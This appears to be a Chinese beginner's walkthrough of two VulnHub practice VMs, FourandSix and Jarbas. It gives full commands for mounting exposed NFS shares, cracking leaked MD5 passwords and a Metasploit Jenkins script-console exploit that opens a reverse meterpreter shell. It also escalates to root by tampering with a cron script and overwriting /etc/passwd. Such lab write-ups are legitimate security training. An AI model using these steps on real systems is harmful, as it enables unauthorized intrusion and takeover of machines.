前言

本次一共实战了两个靶机,FourandSix靶机渗透比较简单,但还是值得记录学习,jarbas靶机稍微难度大点但难度也不高。

FourandSix靶机

环境准备

下载FourandSix靶机:https://download.vulnhub.com/fourandix/FourAndSix-vmware.zip

下载好后解压,如果安装好了vmware直接点击vmx文件,用vmware运行即可

主机:kali linux 222.182.111.132

靶机 : FourandSix靶机

目标:拿下靶机root权限和里面的flag

信息收集

1.确定靶机ip (我是将靶机的网络模式改成nat模式,共享主机的ip,让靶机和主机在同一网段下)

扫描同网段下其余存活主机:

nmap -sP 222.182.111.1/24

222.182.111.1为网关地址,222.182.111.254为虚拟机分配ip的结束地址,222.182.111.132为kali地址,所以确定靶机ip为222.182.111.135

2.扫描靶机确定端口及服务

nmap -sV 222.182.111.135

可以看到靶机开放了三个端口:22(ssh),111(rpcbind),2049(nfs)

测试

靶机开放的三个端口,22端口我们不到万不得已,不会去爆破,这里没有常见的http端口,我们去百度下剩下两个端口对应的服务

nfs服务主要是为了服务端和客户端的网络共享,在客户端可以挂载服务端中的共享目录,在这里靶机相当于服务端,该端口开放意味着靶机存在共享目录等着我们去挂载,里面肯定有重要信息。

而rpcbind服务是一个RPC服务,主要是在nfs共享时候负责通知客户端,服务器的nfs端口号是什么的。简单理解rpc就是一个中介服务。

那现在我们就应该在kali客户端上搭建nfs服务去挂载靶机的共享目录,由于kali默认没有安装NFS客户端工具,需要在kali上安装。

过程如下:

安装nfs-common:

apt-get install nfs-common

打开NFS相关配置文件/etc/exports

leafpad /etc/exports

并且输入以下内容:

/share1 *(sync,ro) 222.182.111.135(sync,rw)     #输出“/share1” 目录,对所有主机可读,对地址为222.182.111.135的主机可读可写,rw表示可读写,sync表示同步写入,数据安全,基本不会丢,但效率低

编辑完成后需要重启服务,先重启rpcbind,再重启nfs

systemctl restart rpcbind
systemctl restart nfs

查看靶机NFS服务器的共享服务器列表

showmount -e 222.182.111.135

可以看到/shared目录是共享的

在kali客户端上创建挂载点

mkdir /mnt/share1
mount -t nfs 222.182.111.135:/shared /mnt/share1    #mount命令主要用于挂载文件。这里将靶机nfs服务端的共享文件夹/shared挂载到kali的/mnt/share1目录下
cd /mnt/share1
ls

可以看到有一个img文件,我们将其创建一个USB-stick目录将img文件挂载到里面,看看里面有什么:

mkdir USB-stick
mount USB-stick.img USB-stick
cd USB-stick
ls -al

看到里面是一些图片,并没有什么:

在这里思路断了,卡了很久。原来根目录也是共享的

在/mnt/share1/USB-stick目录下创建一个jlzj的文件夹,尝试挂载根目录

mkdir jlzj
mount 222.182.111.135:/ jlzj               #挂载到jlzj目录下
cd /jlzj
ls -la

是个惊奇的发现

我们看看root目录里面有什么

我们看看proof.txt有什么

cat proof.txt

5027a37dc785a5d1888bffd4e249e3dd

应该是flag了。

happy hacking!

总结

有时候有许多信息都要自己去先学习了才能找到突破口,比如nfs本菜以前从未听过,也是才学习的,不足之处请多指教,不喜勿喷。

jarbas靶机

环境准备

下载jarbas靶机:https://download.vulnhub.com/jarbas/Jarbas.zip

主机:kali linux 222.182.111.132

靶机 : jarbas靶机

目标:拿下靶机root权限和里面的flag

信息收集

1.确定靶机ip

扫描同网段下其余存活主机:

nmap -sP 222.182.111.1/24

确定靶机ip为222.182.111.137

2.扫描靶机确定端口及服务

nmap -sV -p- 222.182.111.137

可以看到开放了22(ssh),80(http),3306(mysql),8080(http)四个端口

测试

老规矩,我们先访问80端口看看:

一顿查看源代码,查看网络管理器,没发现什么重要的信息,那我们就爆破目录:

dirb http://222.182.111.137:80 /usr/share/dirb/wordlists/big.txt

没爆破到什么重要目录,可能是字典不够强大,那我们换一种方式,用扩展名来探测,测试一些常用的扩展名,如php,html等:

dirb http://222.182.111.137:80 -X .php
dirb http://222.182.111.137:80 -X .html    #dirb的-X参数,代表匹配扩展名,默认字典是/usr/share/dirb/wordlists/common.txt,dirb自带的公共目录,会将字典内的内容加上扩展名去爆破

common.txt如图所示:

爆破到access.html:

我们看看里面有什么:

发现三组用户名及其密码hash,本菜尝试用md5解密,解密得到三组用户名及密码

tiago:italia99

trindade:marianna

eder:vipsu

尝试在网页登录,连接ssh都不可行

那我们看看8080端口有什么线索:

发现是一个登录页面,我们用三组用户密码尝试,发现最后一组可行,登录成功:

这是一个jenkins平台,Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。

我们在用metasploit试试看看能否获取会话

google一波,发现默认就有一个模块jenkins_script_console

试一试

依次输入以下命令:

use exploit/multi/http/jenkins_script_console
show options
set target 1
set USERNAME eder
set PASSWORD vipsu
set RHOST 222.182.111.137
set RPORT 8080
set TARGETURI /
show payloads 
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 222.182.111.132
exploit

配置完成后为下图所示:

成功拿到了会话:

提权

提权方式如下:

我们查看下 /etc/crontab文件,该文件里记录的是隔一段时间执行的一些命令,也就是会记录crontab命令隔一段时间执行的命令的调度表。

可以看到/etc/script/目录下的CleaningScript.sh文件会隔五分钟执行一次,原本是用于每隔五分钟删除访问日志,这个文件的执行权限是root,正因为这个文件的执行权限是root,所以这里有一个思路:

我们上传一个伪造的passwd文件,我们在里面添加一个具有root权限的超级用户jlzj,因为一般的cp拷贝命令是没有权限操作/etc/passwd文件的,所以我们需要将给cp命令添加权限的命令写入CleaningScript.sh文件中,隔五分钟自动执行一次,这样cp拷贝命令执行时具有对/etc/passwd的操作权限,就可以替换掉原来的/etc/passwd文件。那么我们就成为了超级用户了

具体实现过程如下:

将给cp命令加权的命令写入文件:

cd /etc/script/             
echo "chmod u+s /usr/bin/cp" > CleaningScript.sh

在终端生成加盐的用户名密码hash

touch passwd
leafpad passwd
openssl passwd -1 -salt jlzj abc123      #该命令用于生成hash,-1表示用MD5基于BSD的密钥算法。用户名为jlzj,密码是abc123

将生成的新用户hash加入到伪造的passwd文件中:

接着执行如下命令:

upload /root/passwd /tmp              #这里需要先crtl+c退出shell回到会话,再用会话的upload命令上传到/tmp目录下
shell                                #切换到shell
python -c 'import pty;pty.spawn("/bin/bash")'

在shell执行:

cd /tmp
cp passwd /etc/passwd                  #拷贝伪造得的passwd文件覆盖原本的/etc/passwd文件
cat /etc/passwd                   #查看是否拷贝成功

拷贝成功

接下来我们切换到新创建的jlzj用户:

su jlzj

输入密码abc123,成功拿到root权限:

接下来切换到root目录下拿到flag.txt即可:

总结

靶机总体难度不算难,我认为有三个难点:

1.爆破目录时,也要讲究技巧,不能一味使用字典,当然字典足够强大也可以(嘿嘿,手动滑稽)

2.寻找可用的metasploit的模块

3.最后提权的思路,当然思路可能有其他,那就等待大佬们去发现啦。

本文写的比较琐碎详细,可能比较适合新手,大佬们不喜勿喷哈。

参考链接

http://www.rkali.com/2018/04/20/nfs/

https://zhidao.baidu.com/question/617321960475860852.html

https://blog.csdn.net/frankarmstrong/article/details/78774679

https://baike.baidu.com/item/NFS/812203?fr=aladdin

https://www.exploit-db.com/exploits/24272/

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖